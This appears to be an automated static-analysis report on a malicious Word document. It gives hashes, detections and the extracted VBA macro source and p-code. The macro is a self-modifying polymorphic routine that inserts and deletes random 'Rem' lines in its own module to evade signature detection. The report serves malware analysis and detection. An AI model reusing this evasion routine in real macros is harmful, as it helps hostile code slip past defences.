Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 cf7fe48b7a5c2b9b…

MALICIOUS

Office (OLE)

Size: 33.5 KB
Created: 1999-06-11 16:11:00
Authoring application: Microsoft Word 8.0
First seen: 2012-06-14
MD5: 8fca267d78e1c5e7ff3c61f8c729c3b0
SHA-1: 91aee742a192da03d39a026731cf2ce9a555dd3a
SHA-256: cf7fe48b7a5c2b9bc7d88bd5f17c4171d727c91a6ea14aa59b2a24fb3962fa26
Risk score: 80

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic

The sample is an Office document containing VBA macros. The 'SomePolymorphicSystem' subroutine in the 'SPS' module rewrites its own module at run time through the VBE object model: when the module exceeds 76 lines it deletes a random number of 'Rem' comment lines, otherwise it inserts between one and ten 'Rem' lines of random characters at random positions. The module's content therefore differs on every run, which is likely intended to evade signature-based detection. No direct payload or network communication is evident from the extracted script, but this obfuscation technique strongly suggests malicious intent, possibly to download and execute a second-stage payload.

Heuristics (2)

  • ClamAV: Win.Tool.W97M-4 (severity: critical, rule: CLAMAV_DETECTION)
    ClamAV detected this file as malware: Win.Tool.W97M-4
  • VBA macros detected (severity: medium, rule: OLE_VBA_MACROS)
    Document contains VBA macro code

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 4530 bytes
SHA-256: 7855ba1d64903c2be1279e23b86877015190fceb1360e7eb2021dcdf9b99bf9a
Preview script (first 1,000 lines of the extracted script)
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "SPS"
Sub SomePolymorphicSystem()
Randomize
AktuelleZeilenAnzahl = Application.VBE.ActiveVBProject.VBComponents("SPS").CodeModule.CountOfLines
If AktuelleZeilenAnzahl > 76 Then
    Kleiner = Int(Rnd * (AktuelleZeilenAnzahl - 26))
        For ii = 1 To AktuelleZeilenAnzahl
            If Left(Application.VBE.ActiveVBProject.VBComponents("SPS").CodeModule.Lines(ii, 1), 3) = "Rem" Then
                Application.VBE.ActiveVBProject.VBComponents("SPS").CodeModule.DeleteLines ii
                x = x + 1
                If x = Kleiner Then Exit For
            End If
        Next
Else
PolySize = Int(Rnd * 10) + 1
    For PolyMorphic = 1 To PolySize
        PolyString = ""
        PolyLines = Application.VBE.ActiveVBProject.VBComponents("SPS").CodeModule.CountOfLines
        RndLine = Int(Rnd * PolyLines) + 1
        StringSize = Int(Rnd * 39) + 1
            For SomeString = 1 To StringSize
                PolyString = PolyString & Chr(65 + Int(Rnd * 22)) & Chr(122 - Int(Rnd * 22))
            Next SomeString
        Application.VBE.ActiveVBProject.VBComponents("SPS").CodeModule.InsertLines RndLine, "Rem " & PolyString
    Next PolyMorphic
End If
End Sub

' Processing file: /opt/analyzer/scan_staging/e2e2371f048544a7b77f6846bb670392.bin
' ===============================================================================
' Module streams:
' Macros/VBA/ThisDocument - 1199 bytes
' Macros/VBA/SPS - 5948 bytes
' Line #0:
' 	FuncDefn (Sub SomePolymorphicSystem())
' Line #1:
' 	ArgsCall Read 0x0000 
' Line #2:
' 	LitStr 0x0003 "SPS"
' 	Ld Application 
' 	MemLd VBE 
' 	MemLd ActiveVBProject 
' 	ArgsMemLd VBComponents 0x0001 
' 	MemLd CodeModule 
' 	MemLd CountOfLines 
' 	St AktuelleZeilenAnzahl 
' Line #3:
' 	Ld AktuelleZeilenAnzahl 
' 	LitDI2 0x004C 
' 	Gt 
' 	IfBlock 
' Line #4:
' 	Ld Rnd 
' 	Ld AktuelleZeilenAnzahl 
' 	LitDI2 0x001A 
' 	Sub 
' 	Paren 
' 	Mul 
' 	FnInt 
' 	St Kleiner 
' Line #5:
' 	StartForVariable 
' 	Ld ii 
' 	EndForVariable 
' 	LitDI2 0x0001 
' 	Ld AktuelleZeilenAnzahl 
' 	For 
' Line #6:
' 	Ld ii 
' 	LitDI2 0x0001 
' 	LitStr 0x0003 "SPS"
' 	Ld Application 
' 	MemLd VBE 
' 	MemLd ActiveVBProject 
' 	ArgsMemLd VBComponents 0x0001 
' 	MemLd CodeModule 
' 	ArgsMemLd Lines 0x0002 
' 	LitDI2 0x0003 
' 	ArgsLd LBound 0x0002 
' 	LitStr 0x0003 "Rem"
' 	Eq 
' 	IfBlock 
' Line #7:
' 	Ld ii 
' 	LitStr 0x0003 "SPS"
' 	Ld Application 
' 	MemLd VBE 
' 	MemLd ActiveVBProject 
' 	ArgsMemLd VBComponents 0x0001 
' 	MemLd CodeModule 
' 	ArgsMemCall DeleteLines 0x0001 
' Line #8:
' 	Ld x 
' 	LitDI2 0x0001 
' 	Add 
' 	St x 
' Line #9:
' 	Ld x 
' 	Ld Kleiner 
' 	Eq 
' 	If 
' 	BoSImplicit 
' 	ExitFor 
' 	EndIf 
' Line #10:
' 	EndIfBlock 
' Line #11:
' 	StartForVariable 
' 	Next 
' Line #12:
' 	ElseBlock 
' Line #13:
' 	Ld Rnd 
' 	LitDI2 0x000A 
' 	Mul 
' 	FnInt 
' 	LitDI2 0x0001 
' 	Add 
' 	St PolySize 
' Line #14:
' 	StartForVariable 
' 	Ld PolyMorphic 
' 	EndForVariable 
' 	LitDI2 0x0001 
' 	Ld PolySize 
' 	For 
' Line #15:
' 	LitStr 0x0000 ""
' 	St PolyString 
' Line #16:
' 	LitStr 0x0003 "SPS"
' 	Ld Application 
' 	MemLd VBE 
' 	MemLd ActiveVBProject 
' 	ArgsMemLd VBComponents 0x0001 
' 	MemLd CodeModule 
' 	MemLd CountOfLines 
' 	St PolyLines 
' Line #17:
' 	Ld Rnd 
' 	Ld PolyLines 
' 	Mul 
' 	FnInt 
' 	LitDI2 0x0001 
' 	Add 
' 	St RndLine 
' Line #18:
' 	Ld Rnd 
' 	LitDI2 0x0027 
' 	Mul 
' 	FnInt 
' 	LitDI2 0x0001 
' 	Add 
' 	St StringSize 
' Line #19:
' 	StartForVariable 
' 	Ld SomeString 
' 	EndForVariable 
' 	LitDI2 0x0001 
' 	Ld StringSize 
' 	For 
' Line #20:
' 	Ld PolyString 
' 	LitDI2 0x0041 
' 	Ld Rnd 
' 	LitDI2 0x0016 
' 	Mul 
' 	FnInt 
' 	Add 
' 	ArgsLd Chr 0x0001 
' 	Concat 
' 	LitDI2 0x007A 
' 	Ld Rnd 
' 	LitDI2 0x0016 
' 	Mul 
' 	FnInt 
' 	Sub 
' 	ArgsLd Chr 0x0001 
' 	Concat 
' 	St PolyString 
' Line #21:
' 	StartForVariable 
'
... (truncated)